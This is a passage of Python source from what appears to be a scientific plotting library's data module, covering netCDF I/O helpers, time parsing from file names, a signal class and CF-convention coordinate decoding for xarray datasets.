arr_names: string, list of strings or dictionary
Set the unique array names of the resulting arrays and (optionally)
dimensions.
- if string: same as list of strings (see below). Strings may
include {0} which will be replaced by a counter.
        - list of strings: those will be used for the array names. The final
          number of dictionaries in the return value depends in this case on
          `dims` and ``**kwargs``
- dictionary:
Then nothing happens and an :class:`OrderedDict` version of
`arr_names` is returned.
sort: list of strings
This parameter defines how the dictionaries are ordered. It has no
effect if `arr_names` is a dictionary (use a
:class:`~collections.OrderedDict` for that). It can be a list of
dimension strings matching to the dimensions in `dims` for the
variable.
dims: dict
Keys must be variable names of dimensions (e.g. time, level, lat or
lon) or 'name' for the variable name you want to choose.
Values must be values of that dimension or iterables of the values
(e.g. lists). Note that strings will be put into a list.
For example dims = {'name': 't2m', 'time': 0} will result in one plot
for the first time step, whereas dims = {'name': 't2m', 'time': [0, 1]}
will result in two plots, one for the first (time == 0) and one for the
second (time == 1) time step.
``**kwargs``
The same as `dims` (those will update what is specified in `dims`)
Returns
-------
~collections.OrderedDict
        A mapping from the keys in `arr_names` to dictionaries. Each
        dictionary defines the coordinates of one data array to load"""
try:
return OrderedDict(arr_names)
except (ValueError, TypeError):
# ValueError for cyordereddict, TypeError for collections.OrderedDict
pass
if arr_names is None:
arr_names = repeat('arr{0}')
elif isstring(arr_names):
arr_names = repeat(arr_names)
dims = OrderedDict(dims)
for key, val in six.iteritems(kwargs):
dims.setdefault(key, val)
sorted_dims = OrderedDict()
if sort:
for key in sort:
sorted_dims[key] = dims.pop(key)
for key, val in six.iteritems(dims):
sorted_dims[key] = val
else:
# make sure, it is first sorted for the variable names
if 'name' in dims:
sorted_dims['name'] = None
for key, val in sorted(dims.items()):
sorted_dims[key] = val
for key, val in six.iteritems(kwargs):
sorted_dims.setdefault(key, val)
for key, val in six.iteritems(sorted_dims):
sorted_dims[key] = iter(safe_list(val))
return OrderedDict([
(arr_name.format(i), dict(zip(sorted_dims.keys(), dim_tuple)))
for i, (arr_name, dim_tuple) in enumerate(zip(
arr_names, product(
*map(list, sorted_dims.values()))))])
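# Illustrative example (variable and dimension names are assumptions): two
# arrays for two time steps of a variable 't2m':
# >>> setup_coords(dims={'name': 't2m', 'time': [0, 1]})
# OrderedDict([('arr0', {'name': 't2m', 'time': 0}),
#              ('arr1', {'name': 't2m', 'time': 1})])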
def to_slice(arr):
"""Test whether `arr` is an integer array that can be replaced by a slice
Parameters
----------
arr: numpy.array
Numpy integer array
Returns
-------
slice or None
        If `arr` could be converted to a slice, the slice is returned,
        otherwise `None` is returned
See Also
--------
get_index_from_coord"""
if isinstance(arr, slice):
return arr
if len(arr) == 1:
return slice(arr[0], arr[0] + 1)
step = np.unique(arr[1:] - arr[:-1])
if len(step) == 1:
return slice(arr[0], arr[-1] + step[0], step[0])
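# Illustration of the two outcomes (not part of the original module):
# to_slice(np.array([2, 4, 6])) -> slice(2, 8, 2) (uniform step of 2),
# whereas to_slice(np.array([0, 1, 3])) -> None (mixed steps).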
def get_index_from_coord(coord, base_index):
"""Function to return the coordinate as integer, integer array or slice
If `coord` is zero-dimensional, the corresponding integer in `base_index`
will be supplied. Otherwise it is first tried to return a slice, if that
does not work an integer array with the corresponding indices is returned.
Parameters
----------
coord: xarray.Coordinate or xarray.Variable
Coordinate to convert
base_index: pandas.Index
The base index from which the `coord` was extracted
Returns
-------
int, array of ints or slice
The indexer that can be used to access the `coord` in the
`base_index`
"""
try:
values = coord.values
except AttributeError:
values = coord
if values.ndim == 0:
return base_index.get_loc(values[()])
if len(values) == len(base_index) and (values == base_index).all():
return slice(None)
values = np.array(list(map(lambda i: base_index.get_loc(i), values)))
return to_slice(values) or values
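# Sketch of the three possible return types (inputs are assumptions):
#   base = pd.Index([10, 20, 30, 40])
#   get_index_from_coord(np.array(20), base)           -> 1
#   get_index_from_coord(np.array([20, 30]), base)     -> slice(1, 3, 1)
#   get_index_from_coord(np.array([10, 20, 40]), base) -> array([0, 1, 3])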
#: mapping that translates datetime format strings to regex patterns
t_patterns = {
'%Y': '[0-9]{4}',
'%m': '[0-9]{1,2}',
'%d': '[0-9]{1,2}',
'%H': '[0-9]{1,2}',
'%M': '[0-9]{1,2}',
'%S': '[0-9]{1,2}',
}
@docstrings.get_sections(base='get_tdata')
@dedent
def get_tdata(t_format, files):
"""
Get the time information from file names
Parameters
----------
t_format: str
The string that can be used to get the time information in the files.
Any numeric datetime format string (e.g. %Y, %m, %H) can be used, but
not non-numeric strings like %b, etc. See [1]_ for the datetime format
strings
files: list of str
        The file names that contain the time information
Returns
-------
pandas.Index
The time coordinate
list of str
        The file names as they are sorted in the returned index
References
----------
.. [1] https://docs.python.org/2/library/datetime.html"""
def median(arr):
return arr.min() + (arr.max() - arr.min())/2
import re
from pandas import Index
t_pattern = t_format
for fmt, patt in t_patterns.items():
t_pattern = t_pattern.replace(fmt, patt)
t_pattern = re.compile(t_pattern)
time = list(range(len(files)))
for i, f in enumerate(files):
time[i] = median(np.array(list(map(
lambda s: np.datetime64(dt.datetime.strptime(s, t_format)),
t_pattern.findall(f)))))
ind = np.argsort(time) # sort according to time
files = np.array(files)[ind]
time = np.array(time)[ind]
return to_datetime(Index(time, name='time')), files
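# Hypothetical usage: monthly files named like 't2m_201001.nc' parsed with
# t_format='t2m_%Y%m.nc' yield a DatetimeIndex (one median timestamp per
# file) and the file list reordered chronologically.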
docstrings.get_sections(xr.Dataset.to_netcdf.__doc__,
'xarray.Dataset.to_netcdf')
@docstrings.dedent
def to_netcdf(ds, *args, **kwargs):
"""
Store the given dataset as a netCDF file
    This function works essentially the same as the usual
:meth:`xarray.Dataset.to_netcdf` method but can also encode absolute time
units
Parameters
----------
ds: xarray.Dataset
The dataset to store
%(xarray.Dataset.to_netcdf.parameters)s
"""
to_update = {}
for v, obj in six.iteritems(ds.variables):
units = obj.attrs.get('units', obj.encoding.get('units', None))
if units == 'day as %Y%m%d.%f' and np.issubdtype(
obj.dtype, np.datetime64):
to_update[v] = xr.Variable(
obj.dims, AbsoluteTimeEncoder(obj), attrs=obj.attrs.copy(),
encoding=obj.encoding)
to_update[v].attrs['units'] = units
if to_update:
ds = ds.copy()
ds.update(to_update)
return xarray_api.to_netcdf(ds, *args, **kwargs)
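# Minimal usage sketch (assuming `ds` is an xarray.Dataset): behaves like
# ds.to_netcdf('out.nc'), except that variables with absolute time units
# 'day as %Y%m%d.%f' are re-encoded before writing:
#   to_netcdf(ds, 'out.nc')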
def _get_fname_netCDF4(store):
"""Try to get the file name from the NetCDF4DataStore store"""
return getattr(store, '_filename', None)
def _get_fname_scipy(store):
"""Try to get the file name from the ScipyDataStore store"""
try:
return store.ds.filename
except AttributeError:
return None
def _get_fname_nio(store):
"""Try to get the file name from the NioDataStore store"""
try:
f = store.ds.file
except AttributeError:
return None
try:
return f.path
except AttributeError:
return None
class Signal(object):
"""Signal to connect functions to a specific event
This class behaves almost similar to PyQt's
:class:`PyQt4.QtCore.pyqtBoundSignal`
"""
instance = None
owner = None
def __init__(self, name=None, cls_signal=False):
self.name = name
self.cls_signal = cls_signal
self._connections = []
def connect(self, func):
if func not in self._connections:
self._connections.append(func)
def emit(self, *args, **kwargs):
if (not getattr(self.owner, 'block_signals', False) and
not getattr(self.instance, 'block_signals', False)):
logger.debug('Emitting signal %s', self.name)
for func in self._connections[:]:
logger.debug('Calling %s', func)
func(*args, **kwargs)
def disconnect(self, func=None):
"""Disconnect a function call to the signal. If None, all connections
are disconnected"""
if func is None:
self._connections = []
else:
self._connections.remove(func)
def __get__(self, instance, owner):
self.owner = owner
if instance is None or self.cls_signal:
return self
ret = getattr(instance, self.name, None)
if ret is None:
setattr(instance, self.name, Signal(self.name))
ret = getattr(instance, self.name, None)
ret.instance = instance
return ret
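# Minimal sketch of the descriptor above (class and handler names are
# purely illustrative):
#
#   class Plotter(object):
#       onupdate = Signal('_onupdate')
#
#   def handler(*args):
#       print('updated', args)
#
#   p = Plotter()
#   p.onupdate.connect(handler)
#   p.onupdate.emit(1)       # calls handler(1) unless signals are blocked
#   p.onupdate.disconnect()  # drops all connections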
#: functions to use to extract the file name from a data store
get_fname_funcs = [_get_fname_netCDF4, _get_fname_scipy, _get_fname_nio]
@docstrings.get_sections(base='get_filename_ds')
@docstrings.dedent
def get_filename_ds(ds, dump=True, paths=None, **kwargs):
"""
Return the filename of the corresponding to a dataset
This method returns the path to the `ds` or saves the dataset
if there exists no filename
Parameters
----------
ds: xarray.Dataset
The dataset you want the path information for
dump: bool
If True and the dataset has not been dumped so far, it is dumped to a
temporary file or the one generated by `paths` is used
paths: iterable or True
An iterator over filenames to use if a dataset has no filename.
If paths is ``True``, an iterator over temporary files will be
created without raising a warning
Other Parameters
----------------
``**kwargs``
Any other keyword for the :func:`to_netcdf` function
%(xarray.Dataset.to_netcdf.parameters)s
Returns
-------
str or None
        None, if the dataset has not yet been dumped to the hard disk and
        `dump` is False, otherwise the complete path to the input file
str
The module of the :class:`xarray.backends.common.AbstractDataStore`
instance that is used to hold the data
str
The class name of the
:class:`xarray.backends.common.AbstractDataStore` instance that is
used to open the data
"""
from tempfile import NamedTemporaryFile
# if already specified, return that filename
if ds.psy._filename is not None:
return tuple([ds.psy._filename] + list(ds.psy.data_store))
def dump_nc():
# make sure that the data store is not closed by providing a
# write argument
if xr_version < (0, 11):
kwargs.setdefault('writer', xarray_api.ArrayWriter())
store = to_netcdf(ds, fname, **kwargs)
else:
# `writer` parameter was removed by
# https://github.com/pydata/xarray/pull/2261
kwargs.setdefault('multifile', True)
store = to_netcdf(ds, fname, **kwargs)[1]
store_mod = store.__module__
store_cls = store.__class__.__name__
ds._file_obj = store
return store_mod, store_cls
def tmp_it():
while True:
yield NamedTemporaryFile(suffix='.nc').name
    def _legacy_get_filename_ds(ds):
        # try to get the filename from the data store of the obj
        #
        # Outdated since the backend-plugin mechanism introduced in
        # xarray 0.18
        fname = None
        # initialize from the dataset accessor; without this, the reads
        # below would raise an UnboundLocalError since both names are also
        # assigned later in this function
        store_mod, store_cls = ds.psy.data_store
        if store_mod is not None:
store = ds._file_obj
# try several engines
if hasattr(store, 'file_objs'):
fname = []
store_mod = []
store_cls = []
for obj in store.file_objs: # mfdataset
_fname = None
for func in get_fname_funcs:
if _fname is None:
_fname = func(obj)
if _fname is not None:
fname.append(_fname)
store_mod.append(obj.__module__)
store_cls.append(obj.__class__.__name__)
fname = tuple(fname)
store_mod = tuple(store_mod)
store_cls = tuple(store_cls)
else:
for func in get_fname_funcs:
fname = func(store)
if fname is not None:
break
return fname, store_mod, store_cls
fname = None
if paths is True or (dump and paths is None):
paths = tmp_it()
elif paths is not None:
if isstring(paths):
paths = iter([paths])
else:
paths = iter(paths)
store_mod, store_cls = ds.psy.data_store
if xr_plugins is None:
fname, store_mod, store_cls = _legacy_get_filename_ds(ds)
elif "source" in ds.encoding:
fname = ds.encoding["source"]
store_mod = None
store_cls = None
# check if paths is provided and if yes, save the file
if fname is None and paths is not None:
fname = next(paths, None)
if dump and fname is not None:
store_mod, store_cls = dump_nc()
ds.psy.filename = fname
ds.psy.data_store = (store_mod, store_cls)
return fname, store_mod, store_cls
class CFDecoder(object):
"""
    Class that interprets the coordinates and attributes according to the
    CF conventions"""
_registry = []
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
def __init__(self, ds=None, x=None, y=None, z=None, t=None):
self.ds = ds
self.x = rcParams['decoder.x'].copy() if x is None else set(x)
self.y = rcParams['decoder.y'].copy() if y is None else set(y)
self.z = rcParams['decoder.z'].copy() if z is None else set(z)
self.t = rcParams['decoder.t'].copy() if t is None else set(t)
@staticmethod
def register_decoder(decoder_class, pos=0):
"""Register a new decoder
        This function registers a decoder class to use
Parameters
----------
decoder_class: type
The class inherited from the :class:`CFDecoder`
pos: int
The position where to register the decoder (by default: the first
            position)"""
CFDecoder._registry.insert(pos, decoder_class)
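    # Hypothetical registration of a custom decoder subclass:
    #   class MyDecoder(CFDecoder):
    #       @classmethod
    #       def can_decode(cls, ds, var):
    #           return 'my_grid' in var.attrs
    #   CFDecoder.register_decoder(MyDecoder)  # consulted first by get_decoder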
@classmethod
@docstrings.get_sections(base='CFDecoder.can_decode', sections=['Parameters',
'Returns'])
def can_decode(cls, ds, var):
"""
Class method to determine whether the object can be decoded by this
decoder class.
Parameters
----------
ds: xarray.Dataset
The dataset that contains the given `var`
var: xarray.Variable or xarray.DataArray
The array to decode
Returns
-------
bool
True if the decoder can decode the given array `var`. Otherwise
False
Notes
-----
The default implementation returns True for any argument. Subclass this
method to be specific on what type of data your decoder can decode
"""
return True
@classmethod
@docstrings.dedent
def get_decoder(cls, ds, var, *args, **kwargs):
"""
Class method to get the right decoder class that can decode the
given dataset and variable
Parameters
----------
%(CFDecoder.can_decode.parameters)s
Returns
-------
CFDecoder
The decoder for the given dataset that can decode the variable
`var`"""
for decoder_cls in cls._registry:
if decoder_cls.can_decode(ds, var):
return decoder_cls(ds, *args, **kwargs)
return CFDecoder(ds, *args, **kwargs)
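    # Usage sketch (dataset and variable name are assumptions): the first
    # registered decoder whose can_decode() returns True wins, with the
    # plain CFDecoder as fallback:
    #   decoder = CFDecoder.get_decoder(ds, ds['t2m'])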
@staticmethod
@docstrings.get_sections(base='CFDecoder.decode_coords', sections=[
'Parameters', 'Returns'])
def decode_coords(ds, gridfile=None):
"""
Sets the coordinates and bounds in a dataset
        This static method sets those coordinates and bounds that are
        marked in the netCDF attributes as coordinates in :attr:`ds` (without
deleting them from the variable attributes because this information is
necessary for visualizing the data correctly)
Parameters
----------
ds: xarray.Dataset
The dataset to decode
gridfile: str
The path to a separate grid file or a xarray.Dataset instance which
may store the coordinates used in `ds`
Returns
-------
xarray.Dataset
`ds` with additional coordinates"""
def add_attrs(obj):
if 'coordinates' in obj.attrs:
extra_coords.update(obj.attrs['coordinates'].split())
obj.encoding['coordinates'] = obj.attrs.pop('coordinates')
if 'grid_mapping' in obj.attrs:
extra_coords.add(obj.attrs['grid_mapping'])
if 'bounds' in obj.attrs:
extra_coords.add(obj.attrs['bounds'])
if gridfile is not None and not isinstance(gridfile, xr.Dataset):
gridfile = open_dataset(gridfile)
extra_coords = set(ds.coords)
for k, v in six.iteritems(ds.variables):
add_attrs(v)
add_attrs(ds)
if gridfile is not None:
ds.update({k: v for k, v in six.iteritems(gridfile.variables)
if k in extra_coords})
if xr_version < (0, 11):
ds.set_coords(extra_coords.intersection(ds.variables),
inplace=True)
else:
ds._coord_names.update(extra_coords.intersection(ds.variables))
return ds
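    # Illustrative call (the grid file name is an assumption; `gridfile`
    # may be a path or an open xarray.Dataset):
    #   ds = CFDecoder.decode_coords(ds, gridfile='grid.nc')
    # Bounds and grid-mapping variables referenced in the attributes are
    # afterwards available as coordinates of `ds`.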
@docstrings.get_sections(base='CFDecoder.is_unstructured', sections=[
'Parameters', 'Returns'])
@docstrings.get_sections(base=
'CFDecoder.get_cell_node_coord',
sections=['Parameters', 'Returns'])
@dedent
def get_cell_node_coord(self, var, coords=None, axis='x', nans=None):
"""
        Get the cell node (bounds) coordinate of the given variable
Parameters
----------
var: xarray.Variable or xarray.DataArray
The variable to check
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
axis: {'x', 'y'}
The spatial axis to check
nans: {None, 'skip', 'only'}
Determines whether values with nan shall be left (None), skipped
(``'skip'``) or shall be the only one returned (``'only'``)
Returns
-------
xarray.DataArray or None
            the bounds coordinate (if it exists)"""
if coords is None:
coords = self.ds.coords
axis = axis.lower()
get_coord = self.get_x if axis == 'x' else self.get_y
coord = get_coord(var, coords=coords)
if coord is not None:
bounds = self._get_coord_cell_node_coord(coord, coords, nans,
var=var)
if bounds is None:
bounds = self.get_plotbounds(coord)
if bounds.ndim == 1:
dim0 = coord.dims[-1]
bounds = xr.DataArray(
np.dstack([bounds[:-1], bounds[1:]])[0],
dims=(dim0, '_bnds'), attrs=coord.attrs.copy(),
name=coord.name + '_bnds')
elif bounds.ndim == 2:
warn("2D bounds are not yet sufficiently tested!")
bounds = xr.DataArray(
np.dstack([bounds[1:, 1:].ravel(),
bounds[1:, :-1].ravel(),
bounds[:-1, :-1].ravel(),
bounds[:-1, 1:].ravel()])[0],
dims=(''.join(var.dims[-2:]), '_bnds'),
attrs=coord.attrs.copy(),
name=coord.name + '_bnds')
else:
raise NotImplementedError(
"More than 2D-bounds are not supported")
if bounds is not None and bounds.shape[-1] == 2:
# normal CF-Conventions for rectangular grids
arr = bounds.values
if axis == 'y':
stacked = np.c_[arr[..., :1], arr[..., :1],
arr[..., 1:], arr[..., 1:]]
if bounds.ndim == 2:
stacked = np.repeat(
stacked.reshape((-1, 4)),
len(self.get_x(var, coords)), axis=0)
else:
stacked = stacked.reshape((-1, 4))
else:
stacked = np.c_[arr, arr[..., ::-1]]
if bounds.ndim == 2:
stacked = np.tile(
stacked, (len(self.get_y(var, coords)), 1))
else:
stacked = stacked.reshape((-1, 4))
bounds = xr.DataArray(
stacked,
dims=('cell', bounds.dims[1]), name=bounds.name,
attrs=bounds.attrs)
return bounds
return None
docstrings.delete_params('CFDecoder.get_cell_node_coord.parameters',
'var', 'axis')
@docstrings.dedent
def _get_coord_cell_node_coord(self, coord, coords=None, nans=None,
var=None):
"""
        Get the boundaries of an unstructured coordinate
Parameters
----------
coord: xr.Variable
The coordinate whose bounds should be returned
%(CFDecoder.get_cell_node_coord.parameters.no_var|axis)s
Returns
-------
%(CFDecoder.get_cell_node_coord.returns)s
"""
bounds = coord.attrs.get('bounds')
if bounds is not None:
bounds = self.ds.coords.get(bounds)
if bounds is not None:
if coords is not None:
bounds = bounds.sel(**{
key: coords[key]
for key in set(coords).intersection(bounds.dims)})
if nans is not None and var is None:
raise ValueError("Need the variable to deal with NaN!")
elif nans is None:
pass
elif nans == 'skip':
dims = [dim for dim in set(var.dims) - set(bounds.dims)]
mask = var.notnull().all(list(dims)) if dims else var.notnull()
try:
bounds = bounds[mask.values]
except IndexError: # 3D bounds
bounds = bounds.where(mask)
elif nans == 'only':
dims = [dim for dim in set(var.dims) - set(bounds.dims)]
mask = var.isnull().all(list(dims)) if dims else var.isnull()
bounds = bounds[mask.values]
else:
raise ValueError(
"`nans` must be either None, 'skip', or 'only'! "
"Not {0}!".format(str(nans)))
return bounds
@docstrings.get_sections(base='CFDecoder._check_unstructured_bounds', sections=[
'Parameters', 'Returns'])
@docstrings.dedent
def _check_unstructured_bounds(self, var, coords=None, axis='x', nans=None):
"""
Checks whether the bounds in the variable attribute are triangular
Parameters
----------
%(CFDecoder.get_cell_node_coord.parameters)s
Returns
-------
bool or None
True if unstructured, None if it could not be determined
xarray.Coordinate or None
the bounds coordinate (if existent)"""
# !!! WILL BE REMOVED IN THE NEAR FUTURE! !!!
bounds = self.get_cell_node_coord(var, coords, axis=axis, nans=nans)
if bounds is not None:
return bounds.shape[-1] == 3, bounds
else:
return None, None
@docstrings.dedent
def is_unstructured(self, var):
"""
Test if a variable is on an unstructured grid
Parameters
----------
%(CFDecoder.is_unstructured.parameters)s
Returns
-------
%(CFDecoder.is_unstructured.returns)s
Notes
-----
Currently this checks the ``'grid_type'`` attribute and the cell
bounds, but the implementation may change in the future to support
hexagonal grids"""
if str(var.attrs.get('grid_type')) == 'unstructured':
return True
xcoord = self.get_x(var)
if xcoord is not None:
bounds = self._get_coord_cell_node_coord(xcoord)
if bounds is not None and bounds.ndim == 2 and bounds.shape[-1] > 2:
return True
@docstrings.dedent
def is_circumpolar(self, var):
"""
Test if a variable is on a circumpolar grid
Parameters
----------
%(CFDecoder.is_unstructured.parameters)s
Returns
-------
%(CFDecoder.is_unstructured.returns)s"""
xcoord = self.get_x(var)
return xcoord is not None and xcoord.ndim == 2
def get_variable_by_axis(self, var, axis, coords=None):
"""Return the coordinate matching the specified axis
This method uses the ``'axis'`` attribute of the coordinates to return
the corresponding coordinate of the given variable
Parameters
----------
var: xarray.Variable
The variable to get the dimension for
axis: {'x', 'y', 'z', 't'}
The axis string that identifies the dimension
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The coordinate for `var` that matches the given `axis` or None if
no coordinate with the right `axis` could be found.
Notes
-----
This is a rather low-level function that only interprets the
CF Conventions. It is used by the :meth:`get_x`,
:meth:`get_y`, :meth:`get_z` and :meth:`get_t` methods
Warning
-------
If none of the coordinates has an ``'axis'`` attribute, we use the
``'coordinates'`` attribute of `var` (if existent).
However, since the CF Conventions do not specify the order in which
the coordinates are stored, we fall back to pattern matching for
latitude (``'lat'``) and longitude (``'lon'``). If these patterns do
not match, we interpret the coordinates such that x: -1, y: -2,
z: -3. This is not entirely safe for unusual dimension names, but it
works for most cases. If you want to be a hundred percent sure, use
the :attr:`x`, :attr:`y`, :attr:`z` and :attr:`t` attributes.
See Also
--------
get_x, get_y, get_z, get_t"""
def get_coord(cname, raise_error=True):
try:
return coords[cname]
except KeyError:
if cname not in self.ds.coords:
if raise_error:
raise
return None
ret = self.ds.coords[cname]
try:
idims = var.psy.idims
except AttributeError: # got xarray.Variable
idims = {}
return ret.isel(**{d: sl for d, sl in idims.items()
if d in ret.dims})
axis = axis.lower()
if axis not in list('xyzt'):
raise ValueError("Axis must be one of X, Y, Z, T, not {0}".format(
axis))
# we first check for the dimensions and then for the coordinates
# attribute
coords = coords or self.ds.coords
coord_names = var.attrs.get('coordinates', var.encoding.get(
'coordinates', '')).split()
if not coord_names:
return
ret = []
matched = []
for coord in map(lambda dim: coords[dim], filter(
lambda dim: dim in coords, chain(
coord_names, var.dims))):
# check for the axis attribute or whether the coordinate is in the
# list of possible coordinate names
if coord.name not in (c.name for c in ret):
if coord.name in getattr(self, axis):
matched.append(coord)
elif coord.attrs.get('axis', '').lower() == axis:
ret.append(coord)
if matched:
if len(set([c.name for c in matched])) > 1:
warn("Found multiple matches for %s coordinate in the "
"coordinates: %s. I use %s" % (
axis, ', '.join([c.name for c in matched]),
matched[0].name),
PsyPlotRuntimeWarning)
return matched[0]
elif ret:
return None if len(ret) > 1 else ret[0]
# If the coordinates attribute is specified but the coordinate
# variables themselves have no 'axis' attribute, we interpret the
# coordinates such that x: -1, y: -2, z: -3
# Since however the CF Conventions do not determine the order on how
# the coordinates shall be saved, we try to use a pattern matching
# for latitude and longitude. This is not very nice, hence it is
# better to specify the :attr:`x` and :attr:`y` attribute
tnames = self.t.intersection(coord_names)
if axis == 'x':
for cname in filter(lambda cname: re.search('lon', cname),
coord_names):
return get_coord(cname)
return get_coord(coord_names[-1], raise_error=False)
elif axis == 'y' and len(coord_names) >= 2:
for cname in filter(lambda cname: re.search('lat', cname),
coord_names):
return get_coord(cname)
return get_coord(coord_names[-2], raise_error=False)
elif (axis == 'z' and len(coord_names) >= 3 and
coord_names[-3] not in tnames):
return get_coord(coord_names[-3], raise_error=False)
elif axis == 't' and tnames:
tname = next(iter(tnames))
if len(tnames) > 1:
warn("Found multiple matches for time coordinate in the "
"coordinates: %s. I use %s" % (', '.join(tnames), tname),
PsyPlotRuntimeWarning)
return get_coord(tname, raise_error=False)
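# A sketch of the CF ``'axis'`` attribute convention that
# ``get_variable_by_axis`` relies on, with made-up data:
#
#     >>> import numpy as np
#     >>> import xarray as xr
#     >>> ds = xr.Dataset(
#     ...     {'temp': (('lat', 'lon'), np.zeros((3, 4)),
#     ...               {'coordinates': 'lat lon'})},
#     ...     coords={'lon': ('lon', np.arange(4), {'axis': 'X'}),
#     ...             'lat': ('lat', np.arange(3), {'axis': 'Y'})})
#     >>> CFDecoder(ds).get_variable_by_axis(ds.temp, 'x').name
#     'lon'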
@docstrings.get_sections(base="CFDecoder.get_x", sections=[
'Parameters', 'Returns'])
@dedent
def get_x(self, var, coords=None):
"""
Get the x-coordinate of a variable
This method searches for the x-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'X', otherwise it checks whether there is an
intersection between the :attr:`x` attribute and the variable's
dimensions, otherwise it returns the coordinate corresponding to the
last dimension of `var`
Parameters
----------
var: xarray.Variable
The variable to get the x-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The x-coordinate or None if it could not be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'x', coords)
if coord is not None:
return coord
return coords.get(self.get_xname(var))
def get_xname(self, var, coords=None):
"""Get the name of the x-dimension
This method gives the name of the x-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str
The coordinate name
See Also
--------
get_x"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'x', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.x.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for x coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the last position
if var.dims:
return var.dims[-1]
@docstrings.get_sections(base="CFDecoder.get_y", sections=[
'Parameters', 'Returns'])
@dedent
def get_y(self, var, coords=None):
"""
Get the y-coordinate of a variable
This method searches for the y-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'Y', otherwise it checks whether there is an
intersection between the :attr:`y` attribute and the variable's
dimensions, otherwise it returns the coordinate corresponding to the
second last dimension of `var` (or the last if `var` is
one-dimensional)
Parameters
----------
var: xarray.Variable
The variable to get the y-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The y-coordinate or None if it could not be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'y', coords)
if coord is not None:
return coord
return coords.get(self.get_yname(var))
def get_yname(self, var, coords=None):
"""Get the name of the y-dimension
This method gives the name of the y-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str
The coordinate name
See Also
--------
get_y"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'y', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.y.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for y coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the last or second last
# position
if var.dims:
if self.is_unstructured(var):
return var.dims[-1]
return var.dims[-2 if var.ndim > 1 else -1]
@docstrings.get_sections(base="CFDecoder.get_z", sections=[
'Parameters', 'Returns'])
@dedent
def get_z(self, var, coords=None):
"""
Get the vertical (z-) coordinate of a variable
This method searches for the z-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'Z', otherwise it checks whether there is an
intersection between the :attr:`z` attribute and the variable's
dimensions, otherwise it returns the coordinate corresponding to the
third last dimension of `var` (or the second last or last if `var` is
two- or one-dimensional)
Parameters
----------
var: xarray.Variable
The variable to get the z-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The z-coordinate or None if no z coordinate could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'z', coords)
if coord is not None:
return coord
zname = self.get_zname(var)
if zname is not None:
return coords.get(zname)
return None
def get_zname(self, var, coords=None):
"""Get the name of the z-dimension
This method gives the name of the z-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str or None
The coordinate name or None if no vertical coordinate could be
found
See Also
--------
get_z"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'z', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.z.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for z coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the third last position
if var.dims:
is_unstructured = self.is_unstructured(var)
icheck = -2 if is_unstructured else -3
min_dim = abs(icheck) if 'variable' not in var.dims else abs(icheck-1)
if var.ndim >= min_dim and var.dims[icheck] != self.get_tname(
var, coords):
return var.dims[icheck]
return None
@docstrings.get_sections(base="CFDecoder.get_t", sections=[
'Parameters', 'Returns'])
@dedent
def get_t(self, var, coords=None):
"""
Get the time coordinate of a variable
This method searches for the time coordinate in the :attr:`ds`. It
first checks whether there is one dimension that holds an ``'axis'``
attribute with 'T', otherwise it checks whether there is an
intersection between the :attr:`t` attribute and the variable's
dimensions, otherwise it returns None
Parameters
----------
var: xarray.Variable
The variable to get the time coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The time coordinate or None if no time coordinate could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 't', coords)
if coord is not None:
return coord
dimlist = list(self.t.intersection(var.dims).intersection(coords))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for time coordinate in the "
"variable: %s. I use %s" % (
', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return coords[dimlist[0]]
tname = self.get_tname(var)
if tname is not None:
return coords.get(tname)
return None
def get_tname(self, var, coords=None):
